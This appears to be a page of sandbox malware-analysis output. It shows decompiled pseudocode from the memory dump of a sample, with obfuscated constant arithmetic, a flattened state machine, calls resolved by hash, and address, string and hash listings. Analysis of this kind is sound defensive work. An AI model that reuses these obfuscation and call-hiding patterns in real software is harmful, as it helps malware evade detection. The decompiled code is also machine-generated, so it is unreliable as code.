				_v516 = _v516 ^ 0x5c3ff1c5;
				_v556 = 0x4e7cf7;
				_v556 = _v556 * 0x30;
				_v556 = _v556 ^ 0xab1a74ca;
				_v556 = _v556 | 0x39490d7c;
				_v556 = _v556 ^ 0xbde6ca21;
				_v304 = 0x79a99e;
				_v304 = _v304 | 0x92bbf026;
				_v304 = _v304 ^ 0x92fabbf2;
				_v444 = 0xf2d903;
				_v444 = _v444 * 0x13;
				_v444 = _v444 << 3;
				_v444 = _v444 ^ 0x90370785;
				_v388 = 0xce947f;
				_v388 = _v388 + 0xf4e6;
				_v388 = _v388 + 0xffffe2fa;
				_v388 = _v388 ^ 0x00c891aa;
				_v440 = 0x3724ee;
				_v440 = _v440 ^ 0xc994252f;
				_v440 = _v440 + 0xffff9dbe;
				_v440 = _v440 ^ 0xc9a5a4c3;
				_v544 = 0x9c24f5;
				_v544 = _v544 >> 8;
				_v544 = _v544 * 0x12;
				_v544 = _v544 + 0xb91e;
				_v544 = _v544 ^ 0x0007bff8;
				_v448 = 0x5ce888;
				_v448 = _v448 / _t849;
				_v448 = _v448 ^ 0x9d1dcba1;
				_v448 = _v448 ^ 0x9d138551;
				_v552 = 0x5ae9b7;
				_v552 = _v552 + 0xffffcdd3;
				_v552 = _v552 >> 0xa;
				_v552 = _v552 >> 3;
				_v552 = _v552 ^ 0x000286f6;
				_v372 = 0x1cfcf8;
				_v372 = _v372 << 0x10;
				_v372 = _v372 ^ 0xfcf9df5b;
				_v572 = 0x7fff3;
				_v572 = _v572 << 3;
				_v572 = _v572 | 0xc07f6c1b;
				_t850 = 0x6c;
				_v572 = _v572 / _t850;
				_v572 = _v572 ^ 0x01c5e077;
				_v468 = 0xb8a28e;
				_v468 = _v468 >> 0xa;
				_t851 = 7;
				_v468 = _v468 * 0x38;
				_v468 = _v468 ^ 0x0004661e;
				_v472 = 0x1c4be2;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 / _t851;
				_v472 = _v472 ^ 0x000b37fd;
				_v324 = 0x397321;
				_v324 = _v324 + 0x4649;
				_v324 = _v324 ^ 0x003dbcde;
				_v564 = 0x90a3d2;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 | 0x55e281c1;
				_v564 = _v564 + 0xffff9c60;
				_v564 = _v564 ^ 0x55ec6797;
				_v524 = 0x36ce4e;
				_v524 = _v524 + 0x9321;
				_v524 = _v524 ^ 0x68577083;
				_v524 = _v524 + 0x842e;
				_v524 = _v524 ^ 0x686a3805;
				_v380 = 0xf92015;
				_t852 = 0x57;
				_v380 = _v380 * 0x31;
				_v380 = _v380 ^ 0x2faa62dc;
				_v428 = 0xf06949;
				_v428 = _v428 ^ 0xe190386e;
				_v428 = _v428 | 0xd7c767f0;
				_v428 = _v428 ^ 0xf7e62dec;
				_v316 = 0x53402;
				_v316 = _v316 ^ 0x1a7eacd5;
				_v316 = _v316 ^ 0x1a780dc3;
				_v396 = 0xea020b;
				_v396 = _v396 / _t852;
				_v396 = _v396 >> 7;
				_v396 = _v396 ^ 0x0007fa92;
				_v576 = 0x94f18;
				_v576 = _v576 + 0x323;
				_t853 = 0x5a;
				_v576 = _v576 / _t853;
				_v576 = _v576 >> 7;
				_v576 = _v576 ^ 0x0009d62c;
				_v340 = 0x5ab89e;
				_v340 = _v340 + 0xcec5;
				_v340 = _v340 ^ 0x005981b9;
				_v424 = 0xf4fb06;
				_v424 = _v424 << 0xf;
				_v424 = _v424 + 0x6e15;
				_v424 = _v424 ^ 0x7d84f79d;
				_v308 = 0xe5ad48;
				_v308 = _v308 + 0xffff809e;
				_v308 = _v308 ^ 0x00e6a4ab;
				_v432 = 0xc8665e;
				_v432 = _v432 | 0xb25d9dfb;
				_v432 = _v432 * 0x51;
				_v432 = _v432 ^ 0x9835fda6;
				_v536 = 0x3c612a;
				_v536 = _v536 ^ 0xe3614c8f;
				_v536 = _v536 + 0x89b2;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x1c61cdd9;
				_v312 = 0xb1cab1;
				_v312 = _v312 + 0x5335;
				_v312 = _v312 ^ 0x00b6c298;
				_v332 = 0x3dadc5;
				_v332 = _v332 >> 0xf;
				_v332 = _v332 ^ 0x00096a38;
				_v320 = 0xd2cf6d;
				_t854 = 0x5e;
				_v320 = _v320 / _t854;
				_v320 = _v320 ^ 0x000f4fea;
				_v528 = 0xbc9a67;
				_t768 = 0x35;
				_v528 = _v528 / _t768;
				_v528 = _v528 ^ 0x531db0de;
				_v528 = _v528 << 2;
				_v528 = _v528 ^ 0x4c7ccc72;
				_v368 = 0x9c5377;
				_v368 = _v368 | 0xa0dcba47;
				_v368 = _v368 ^ 0xa0d1bf3f;
				_v416 = 0x1ec4a4;
				_t855 = 0x79;
				_v416 = _v416 * 0x28;
				_v416 = _v416 / _t855;
				_v416 = _v416 ^ 0x00072384;
				_v376 = 0x2ac77;
				_v376 = _v376 << 0xf;
				_v376 = _v376 ^ 0x563f0855;
				_v412 = 0x448f7a;
				_v412 = _v412 << 0xd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x24738c34;
				_v356 = 0xc97c1e;
				_v356 = _v356 ^ 0x373e9b5c;
				_v356 = _v356 ^ 0x37f1bea5;
				_v548 = 0xc08620;
				_t856 = 0x3e;
				_v548 = _v548 * 0x48;
				_v548 = _v548 >> 0xe;
				_v548 = _v548 + 0x8cd4;
				_v548 = _v548 ^ 0x00077c97;
				_v504 = 0x1bacca;
				_v504 = _v504 / _t856;
				_v504 = _v504 + 0xffff3533;
				_v504 = _v504 + 0xffffc69c;
				_v504 = _v504 ^ 0xfffb1415;
				_v512 = 0x4f44ee;
				_v512 = _v512 + 0x177f;
				_v512 = _v512 + 0xce0c;
				_v512 = _v512 << 2;
				_v512 = _v512 ^ 0x014cc697;
				_v360 = 0x8b661;
				_t857 = 0x1e;
				_v360 = _v360 / _t857;
				_v360 = _v360 ^ 0x000dc15c;
				_v520 = 0xb38031;
				_v520 = _v520 | 0xa1714482;
				_t858 = 0x36;
				_t870 = _v296;
				_v520 = _v520 * 0x52;
				_v520 = _v520 + 0xc23a;
				_v520 = _v520 ^ 0xe016b971;
				_v496 = 0x319ddd;
				_v496 = _v496 / _t858;
				_t859 = 0x3b;
				_t860 = _v296;
				_v496 = _v496 / _t859;
				_v496 = _v496 + 0xffffa02a;
				_v496 = _v496 ^ 0xfff3e4c0;
				_v352 = 0x3691e9;
				_t769 = _v296;
				_v352 = _v352 / _t768;
				_v352 = _v352 ^ 0x000e8b32;
				_v408 = 0x2ac6b;
				_v408 = _v408 * 0x5a;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0xe13230fa;
				_v392 = 0x204939;
				_v392 = _v392 + 0x4ed4;
				_v392 = _v392 * 0x35;
				_v392 = _v392 ^ 0x06bd0f48;
				_v336 = 0x1179fc;
				_v336 = _v336 + 0xffff73d1;
				_v336 = _v336 ^ 0x0013f977;
				_v400 = 0xb07871;
				_v400 = _v400 >> 3;
				_v400 = _v400 | 0xc580b254;
				_v400 = _v400 ^ 0xc59d0b5c;
				_v344 = 0x9fe4dd;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xf932a85a;
				_v328 = 0xd2ff81;
				_v328 = _v328 ^ 0x82aa1598;
				_v328 = _v328 ^ 0x827d602f;
				_v488 = 0x92e76b;
				_v488 = _v488 | 0x6946c4e8;
				_v488 = _v488 + 0xbbca;
				_v488 = _v488 * 0x54;
				_v488 = _v488 ^ 0xbac9f786;
				_v384 = 0xafba80;
				_v384 = _v384 ^ 0x0a481803;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0xb9e44209;
				while(1) {
					L1:
					_t707 = 0x9c71ab3;
					do {
						while(1) {
							L2:
							_t875 = _t864 - 0x86fed85;
							if(_t875 <= 0) {
								break;
							}
							__eflags = _t864 - _t707;
							if(__eflags == 0) {
								_push(_v432);
								_t770 = _t860 + _t870;
								_push(_v308);
								_push(0xd31808);
								_v292 = _t770;
								_t708 = E00D44244(_v340, _v424, __eflags);
								__eflags = _t770 - _t870;
								_t769 = E00D4E1AC(_v536, _t770 - _t870, _t870,  &_v256, _v312,  &_v288, _v332,  &_v128, _v320, _t770 - _t870) + _t870;
								E00D4FECB(_t708, _v528, _v368, _v416, _v376);
								_t774 = _v480;
								_t871 =  &(_t871[0xe]);
								_t864 = 0x1bf95f7;
								_t707 = 0x9c71ab3;
								goto L31;
							}
							__eflags = _t864 - 0xe33788a;
							if(_t864 == 0xe33788a) {
								_t860 = 0x4000;
								_push(_t774);
								_push(_t774);
								_t758 = E00D3C5D8(0x4000);
								_t871 =  &(_t871[3]);
								_v300 = _t758;
								__eflags = _t758;
								if(__eflags == 0) {
									return _t758;
								}
								_t864 = 0x77316ed;
								L14:
								_t774 = _v480;
								while(1) {
									L1:
									_t707 = 0x9c71ab3;
									goto L2;
								}
							}
							__eflags = _t864 - 0xf34fc82;
							if(_t864 == 0xf34fc82) {
								_push(_t774);
								_push(_t774);
								_t860 = E00D4CCA0(4, 0x10);
								_push( &_v128);
								_push(_t860);
								_push(_v560);
								_t833 = 0xb;
								E00D3E404(_v456, _t833);
								_t864 = 0x5f37ccd;
								L13:
								_t871 =  &(_t871[7]);
								goto L14;
							}
							__eflags = _t864 - 0xfefbdda;
							if(_t864 == 0xfefbdda) {
								E00D52B09(_v328, _v300, _v488, _v384);
								return 0;
							}
							__eflags = _t864 - 0xffd9b77;
							if(__eflags != 0) {
								goto L31;
							}
							_t864 = 0x17d426e;
						}
						if(_t875 == 0) {
							_t860 = _t860 +  *((intOrPtr*)(_t774 + 4));
							_push(_t774);
							_push(_t774);
							_t718 = E00D3C5D8(_t860);
							_t774 = _v480;
							_t870 = _t718;
							_t871 =  &(_t871[3]);
							__eflags = _t870;
							_t707 = 0x9c71ab3;
							_t864 =  !=  ? 0x9c71ab3 : 0xfefbdda;
							goto L2;
						}
						if(_t864 == 0x17d426e) {
							_push(_t774);
							_push(_t774);
							_t860 = E00D4CCA0(1, 8);
							_push( &_v288);
							_push(_t860);
							_push(_v492);
							_t832 = 9;
							E00D3E404(_v436, _t832);
							_t864 = 0xf34fc82;
							goto L13;
						}
						if(_t864 == 0x1bf95f7) {
							E00D4C9B0(_v412, _t769, _v356,  *((intOrPtr*)(_t774 + 4)),  *_t774, _v548);
							_t774 = _v480;
							_t871 =  &(_t871[4]);
							_t864 = 0x7c1f8ac;
							_t769 = _t769 +  *((intOrPtr*)(_t774 + 4));
							goto L1;
						}
						if(_t864 == 0x5f37ccd) {
							_t867 =  &_v256;
							_push(_t774);
							_push(_t774);
							_t836 = E00D4CCA0(8, 0x10);
							_t871 =  &(_t871[4]);
							_t732 = _v420;
							__eflags = _t732 - _t836;
							if(_t732 < _t836) {
								_t844 = _t836 - _t732;
								_t861 = _t867;
								_t786 = _t844 >> 1;
								__eflags = _t786;
								_t740 = memset(_t861, 0x2d002d, _t786 << 2);
								asm("adc ecx, ecx");
								_t867 = _t867 + _t844 * 2;
								memset(_t861 + _t786, _t740, 0);
								_t871 =  &(_t871[6]);
								_t774 = 0;
							}
							_push(_t774);
							_push(_t774);
							_t737 = E00D4CCA0(8, 0x10);
							_push(_t867);
							_t860 = _t737;
							_push(_t860);
							_push(_v388);
							_t837 = 0xb;
							E00D3E404(_v444, _t837);
							_t864 = 0xe33788a;
							goto L13;
						}
						if(_t864 == 0x77316ed) {
							_push(_v472);
							_push(_v468);
							_push(_v572);
							_t742 = E00D4E1F8(0xd317a8, _v372, __eflags);
							_t871 =  &(_t871[3]);
							_push( &_v256);
							_push(_t742);
							_push(_t860);
							_push(_v300);
							 *((intOrPtr*)(E00D531AA(0xb00b1257, 0x44)))();
							E00D4FECB(_t742, _v324, _v564, _v524, _v380);
							_t864 = 0x86fed85;
							goto L13;
						}
						_t880 = _t864 - 0x7c1f8ac;
						if(_t864 != 0x7c1f8ac) {
							goto L31;
						}
						_push(_v520);
						_push(_v360);
						_push(0xd31778);
						_t750 = E00D33325( &_v256, E00D44244(_v504, _v512, _t880), _v292 - _t769, _v352, _v408, _t769);
						E00D4FECB(_t747, _v392, _v336, _v400, _v344);
						_t752 = _v296;
						 *_t752 = _t870;
						 *((intOrPtr*)(_t752 + 4)) = _t769 + _t750 - _t870;
						L10:
						return _v300;
						L31:
						__eflags = _t864 - 0xc7faa3a;
					} while (__eflags != 0);
					goto L10;
				}
			}

0x00d42e5d
0x00d42e5d
0x00d42e67
0x00d42e6e
0x00d42e72
0x00d42e7d
0x00d42e8d
0x00d42e94
0x00d42e99
0x00d42ea4
0x00d42eb4
0x00d42eb9
0x00d42ebf
0x00d42ec7
0x00d42ecc
0x00d42ed4
0x00d42edc
0x00d42ee4
0x00d42eec
0x00d42ef4
0x00d42efc
0x00d42f04
0x00d42f11
0x00d42f14
0x00d42f18
0x00d42f20
0x00d42f28
0x00d42f30
0x00d42f40
0x00d42f44
0x00d42f4c
0x00d42f54
0x00d42f5f
0x00d42f72
0x00d42f73
0x00d42f7a
0x00d42f85
0x00d42f8d
0x00d42f92
0x00d42f97
0x00d42f9f
0x00d42fa7
0x00d42fb2
0x00d42fba
0x00d42fc5
0x00d42fd9
0x00d42fe0
0x00d42feb
0x00d42ff6
0x00d42ffe
0x00d43003
0x00d4300b
0x00d43013
0x00d4301b
0x00d43028
0x00d4302c
0x00d43034
0x00d4303c
0x00d43047
0x00d43052
0x00d4305d
0x00d43068
0x00d43070
0x00d43080
0x00d43085
0x00d4308b
0x00d43090
0x00d43098
0x00d430a0
0x00d430ad
0x00d430ae
0x00d430b2
0x00d430ba
0x00d430c2
0x00d430cd
0x00d430d5
0x00d430e0
0x00d430eb
0x00d430f6
0x00d43101
0x00d4310c
0x00d43117
0x00d43122
0x00d4312a
0x00d43135
0x00d43140
0x00d43153
0x00d4315a
0x00d43165
0x00d43172
0x00d43176
0x00d4317e
0x00d43186
0x00d4318e
0x00d4319b
0x00d4319f
0x00d431a7
0x00d431af
0x00d431b7
0x00d431c2
0x00d431cd
0x00d431d8
0x00d431eb
0x00d431f2
0x00d431fa
0x00d43205
0x00d43210
0x00d4321b
0x00d43226
0x00d43231
0x00d4323c
0x00d43247
0x00d43252
0x00d4325d
0x00d43265
0x00d4326f
0x00d43273
0x00d4327b
0x00d43283
0x00d43297
0x00d4329e
0x00d432a9
0x00d432b4
0x00d432bc
0x00d432c4
0x00d432c9
0x00d432ce
0x00d432d6
0x00d432e1
0x00d432e9
0x00d432f4
0x00d432fe
0x00d43303
0x00d43311
0x00d43316
0x00d4331c
0x00d43324
0x00d4332f
0x00d4333f
0x00d43342
0x00d43349
0x00d43354
0x00d4335c
0x00d43369
0x00d4336d
0x00d43375
0x00d43380
0x00d4338b
0x00d43396
0x00d4339e
0x00d433a3
0x00d433ab
0x00d433b3
0x00d433bb
0x00d433c3
0x00d433cb
0x00d433d3
0x00d433db
0x00d433e3
0x00d433f6
0x00d433f9
0x00d43400
0x00d4340b
0x00d43416
0x00d43421
0x00d4342c
0x00d43437
0x00d43442
0x00d4344d
0x00d43458
0x00d4346e
0x00d43475
0x00d4347d
0x00d43488
0x00d43490
0x00d4349c
0x00d4349f
0x00d434a3
0x00d434a8
0x00d434b0
0x00d434bb
0x00d434c6
0x00d434d1
0x00d434dc
0x00d434e4
0x00d434ef
0x00d434fa
0x00d43505
0x00d43510
0x00d4351b
0x00d43526
0x00d43539
0x00d43540
0x00d4354d
0x00d43555
0x00d4355d
0x00d43565
0x00d4356a
0x00d43572
0x00d4357d
0x00d43588
0x00d43593
0x00d4359e
0x00d435a6
0x00d435b1
0x00d435c5
0x00d435ca
0x00d435d3
0x00d435de
0x00d435ea
0x00d435ef
0x00d435f5
0x00d435fd
0x00d43602
0x00d4360a
0x00d43615
0x00d43620
0x00d4362b
0x00d4363e
0x00d43641
0x00d43653
0x00d4365a
0x00d43665
0x00d43670
0x00d43678
0x00d43683
0x00d4368e
0x00d43696
0x00d4369e
0x00d436a9
0x00d436b4
0x00d436bf
0x00d436ca
0x00d436d7
0x00d436da
0x00d436de
0x00d436e3
0x00d436eb
0x00d436f3
0x00d43703
0x00d43707
0x00d4370f
0x00d43717
0x00d4371f
0x00d43727
0x00d4372f
0x00d43737
0x00d4373c
0x00d43744
0x00d43756
0x00d43759
0x00d43760
0x00d4376d
0x00d43775
0x00d43784
0x00d43787
0x00d4378e
0x00d43792
0x00d4379a
0x00d437a2
0x00d437b2
0x00d437ba
0x00d437bf
0x00d437c6
0x00d437ca
0x00d437d2
0x00d437da
0x00d437ee
0x00d437f5
0x00d437fc
0x00d43807
0x00d4381a
0x00d43821
0x00d43829
0x00d43834
0x00d4383f
0x00d43852
0x00d43859
0x00d43864
0x00d4386f
0x00d4387a
0x00d43885
0x00d43890
0x00d43898
0x00d438a3
0x00d438ae
0x00d438b9
0x00d438c1
0x00d438cc
0x00d438d7
0x00d438e2
0x00d438ed
0x00d438f5
0x00d438fd
0x00d4390a
0x00d4390e
0x00d43916
0x00d43921
0x00d4392c
0x00d43934
0x00d4393f
0x00d4393f
0x00d4393f
0x00d43944
0x00d43944
0x00d43944
0x00d43944
0x00d4394a
0x00000000
0x00000000
0x00d43be6
0x00d43be8
0x00d43ca8
0x00d43caf
0x00d43cb2
0x00d43cc7
0x00d43ccc
0x00d43cd3
0x00d43cda
0x00d43d26
0x00d43d34
0x00d43d39
0x00d43d40
0x00d43d43
0x00d43d48
0x00000000
0x00d43d48
0x00d43bee
0x00d43bf4
0x00d43c6d
0x00d43c84
0x00d43c85
0x00d43c87
0x00d43c8c
0x00d43c8f
0x00d43c96
0x00d43c98
0x00d43a22
0x00d43a22
0x00d43c9e
0x00d43a8d
0x00d43a8d
0x00d4393f
0x00d4393f
0x00d4393f
0x00000000
0x00d4393f
0x00d4393f
0x00d43bf6
0x00d43bfc
0x00d43c36
0x00d43c37
0x00d43c41
0x00d43c4a
0x00d43c4b
0x00d43c4c
0x00d43c59
0x00d43c5a
0x00d43c5f
0x00d43a8a
0x00d43a8a
0x00000000
0x00d43a8a
0x00d43bfe
0x00d43c04
0x00d43d77
0x00000000
0x00d43d7e
0x00d43c0a
0x00d43c10
0x00000000
0x00000000
0x00d43c16
0x00d43c16
0x00d43950
0x00d43bb0
0x00d43bc1
0x00d43bc2
0x00d43bc4
0x00d43bc9
0x00d43bcd
0x00d43bcf
0x00d43bd7
0x00d43bd9
0x00d43bde
0x00000000
0x00d43bde
0x00d4395c
0x00d43b72
0x00d43b73
0x00d43b7d
0x00d43b86
0x00d43b87
0x00d43b88
0x00d43b95
0x00d43b96
0x00d43b9b
0x00000000
0x00d43b9b
0x00d43968
0x00d43b46
0x00d43b4b
0x00d43b52
0x00d43b55
0x00d43b5a
0x00000000
0x00d43b5a
0x00d43974
0x00d43a9d
0x00d43ab6
0x00d43ab7
0x00d43ac1
0x00d43ac3
0x00d43ac6
0x00d43acd
0x00d43acf
0x00d43ad1
0x00d43ad3
0x00d43adc
0x00d43adc
0x00d43ade
0x00d43ae0
0x00d43ae2
0x00d43ae5
0x00d43ae5
0x00d43ae5
0x00d43ae5
0x00d43afe
0x00d43aff
0x00d43b04
0x00d43b09
0x00d43b0a
0x00d43b0c
0x00d43b0d
0x00d43b1d
0x00d43b1e
0x00d43b23
0x00000000
0x00d43b23
0x00d43980
0x00d43a23
0x00d43a2c
0x00d43a33
0x00d43a3e
0x00d43a43
0x00d43a54
0x00d43a55
0x00d43a56
0x00d43a57
0x00d43a66
0x00d43a80
0x00d43a85
0x00000000
0x00d43a85
0x00d43986
0x00d4398c
0x00000000
0x00000000
0x00d43992
0x00d43996
0x00d439a5
0x00d439d6
0x00d439fb
0x00d43a00
0x00d43a0c
0x00d43a0e
0x00d43a11
0x00000000
0x00d43d4d
0x00d43d4d
0x00d43d4d
0x00000000
0x00d43d59

Strings

*a<, xrefs: 00D4354D
8j, xrefs: 00D435A6
I,, xrefs: 00D42F85
DO, xrefs: 00D4371F
!s9, xrefs: 00D43375
$7, xrefs: 00D43231
9I , xrefs: 00D43834
Gd, xrefs: 00D43117
IF, xrefs: 00D43380
1TPy, xrefs: 00D4310C
5S, xrefs: 00D4357D
DJ3, xrefs: 00D42F28
Sg, xrefs: 00D43098
kn_, xrefs: 00D430C2
3, xrefs: 00D42FBA
-3n3, xrefs: 00D42F18
|I9, xrefs: 00D431A7

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
API String ID: 0-3070105227
Opcode ID: 467c08be84fc2cc41c251c7f8e3b7853fd6cb7f7f1a9464b25a7e399ba5f188f
Instruction ID: def73845f1423b11ef4a68b941c450d48aa94697f67213e131337829b39df0d4
Opcode Fuzzy Hash: 467c08be84fc2cc41c251c7f8e3b7853fd6cb7f7f1a9464b25a7e399ba5f188f
Instruction Fuzzy Hash: 6A721E715083819BD3B8CF25C58AB9BFBE1BBC4314F10891DE6DA9A260D7B09949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D33431, Relevance: 17.0, Strings: 13, Instructions: 746
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00D33431(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t880;
				void* _t883;
				intOrPtr _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t905;
				intOrPtr _t918;
				void* _t919;
				intOrPtr _t925;
				intOrPtr _t927;
				void* _t929;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				void* _t952;
				intOrPtr _t974;
				intOrPtr _t977;
				void* _t1017;
				intOrPtr _t1018;
				void* _t1038;
				intOrPtr _t1039;
				void* _t1041;
				void* _t1046;
				signed int* _t1048;
				signed int* _t1052;
				void* _t1054;

				_t1048 =  &_v448;
				_v436 = 0x369131;
				_v436 = _v436 >> 0xc;
				_v72 = __ecx;
				_t1046 = 0;
				_t935 = 0x47;
				_v436 = _v436 / _t935;
				_t929 = 0xda5043f;
				_t936 = 0x5f;
				_v436 = _v436 * 0x17;
				_v436 = _v436 ^ 0x4d42455f;
				_v208 = 0xf6fdfa;
				_v208 = _v208 | 0x2cc981c8;
				_v208 = _v208 ^ 0x2cfffdfb;
				_v424 = 0xd0dd87;
				_v424 = _v424 << 0xd;
				_v424 = _v424 | 0x1c0753be;
				_v424 = _v424 << 0xb;
				_v424 = _v424 ^ 0xbf9df000;
				_v168 = 0x27916c;
				_v168 = _v168 << 0xc;
				_v168 = _v168 ^ 0x7916c000;
				_v112 = 0xb477a9;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0xa3bd4800;
				_v220 = 0xe97999;
				_v220 = _v220 + 0xffffec6a;
				_v220 = _v220 ^ 0x00e96603;
				_v204 = 0x9e1a7f;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0x0004f0d3;
				_v268 = 0x424ea5;
				_v268 = _v268 ^ 0x63de6ac8;
				_v268 = _v268 + 0xffff47e2;
				_v268 = _v268 ^ 0x639b6c4f;
				_v260 = 0xd00e0b;
				_v260 = _v260 + 0x7bec;
				_v260 = _v260 + 0x9dda;
				_v260 = _v260 ^ 0x00d127d1;
				_v200 = 0x4c3c29;
				_v200 = _v200 + 0xffffc8b9;
				_v200 = _v200 ^ 0x004c04e2;
				_v248 = 0x4debf8;
				_v248 = _v248 + 0xffff1b2a;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0x9a0e4400;
				_v228 = 0x8afd86;
				_v228 = _v228 / _t936;
				_v228 = _v228 << 4;
				_v228 = _v228 ^ 0x001768a0;
				_v96 = 0x2eb3c6;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xd678c020;
				_v420 = 0x274aed;
				_v420 = _v420 | 0x31740d1a;
				_v420 = _v420 + 0xffff9582;
				_v420 = _v420 | 0x350cf820;
				_v420 = _v420 ^ 0x35767196;
				_v364 = 0x6881b7;
				_v364 = _v364 * 7;
				_v364 = _v364 + 0xffffc912;
				_v364 = _v364 * 0x25;
				_v364 = _v364 ^ 0x69b6ddf9;
				_v184 = 0xd44f20;
				_v184 = _v184 ^ 0xce5a0ea9;
				_v184 = _v184 ^ 0xce89b855;
				_v264 = 0x81d5a2;
				_v264 = _v264 >> 8;
				_v264 = _v264 ^ 0x29112c15;
				_v264 = _v264 ^ 0x291faa41;
				_v100 = 0x37cb15;
				_t937 = 6;
				_v100 = _v100 * 0x62;
				_v100 = _v100 ^ 0x1559514e;
				_v380 = 0xd5dbc2;
				_v380 = _v380 ^ 0x7753e321;
				_v380 = _v380 + 0xffff7b0c;
				_v380 = _v380 << 8;
				_v380 = _v380 ^ 0x85ba1641;
				_v176 = 0xe5b425;
				_v176 = _v176 ^ 0xa878a978;
				_v176 = _v176 ^ 0xa898c785;
				_v120 = 0xd260b8;
				_v120 = _v120 / _t937;
				_v120 = _v120 ^ 0x00230c57;
				_v288 = 0xdcc1d5;
				_v288 = _v288 | 0xf1bc740f;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x000063e4;
				_v232 = 0xe5d66a;
				_t938 = 0x2c;
				_v232 = _v232 * 0x6c;
				_v232 = _v232 / _t938;
				_v232 = _v232 ^ 0x02301c7d;
				_v296 = 0x2a124;
				_v296 = _v296 | 0xd0f8a1f6;
				_v296 = _v296 >> 3;
				_v296 = _v296 ^ 0x1a145567;
				_v160 = 0xc3c6af;
				_v160 = _v160 + 0xd2dc;
				_v160 = _v160 ^ 0x00c22786;
				_v348 = 0x8f150e;
				_v348 = _v348 + 0xa59e;
				_t939 = 0x59;
				_v348 = _v348 / _t939;
				_v348 = _v348 >> 0xe;
				_v348 = _v348 ^ 0x00038203;
				_v412 = 0x22c1c6;
				_v412 = _v412 | 0x52a0f1e9;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0x5f9c;
				_v412 = _v412 ^ 0x0003206f;
				_v256 = 0x6eace8;
				_v256 = _v256 | 0x5e36471d;
				_v256 = _v256 + 0xaa22;
				_v256 = _v256 ^ 0x5e7c911d;
				_v372 = 0x114227;
				_v372 = _v372 << 0xe;
				_v372 = _v372 >> 4;
				_v372 = _v372 + 0xffff3250;
				_v372 = _v372 ^ 0x05091a3a;
				_v152 = 0xb2c113;
				_v152 = _v152 | 0xd4a79ff0;
				_v152 = _v152 ^ 0xd4b69369;
				_v404 = 0xac8dd0;
				_v404 = _v404 | 0xfe2c74c4;
				_v404 = _v404 + 0xfffff2df;
				_v404 = _v404 ^ 0xd6ca137b;
				_v404 = _v404 ^ 0x2865160f;
				_v92 = 0xc872d4;
				_v92 = _v92 ^ 0x1ab36d9e;
				_v92 = _v92 ^ 0x1a793755;
				_v104 = 0x4ab196;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0x4ab50517;
				_v448 = 0xada0e7;
				_t940 = 0x71;
				_v448 = _v448 * 0x69;
				_v448 = _v448 ^ 0xf900bd50;
				_v448 = _v448 + 0x197e;
				_v448 = _v448 ^ 0xbe3853b0;
				_v396 = 0x11e923;
				_v396 = _v396 + 0x3954;
				_v396 = _v396 / _t940;
				_v396 = _v396 >> 0xc;
				_v396 = _v396 ^ 0x00018e0c;
				_v336 = 0x5f85c1;
				_v336 = _v336 | 0x2e05641a;
				_v336 = _v336 + 0xffffe3b2;
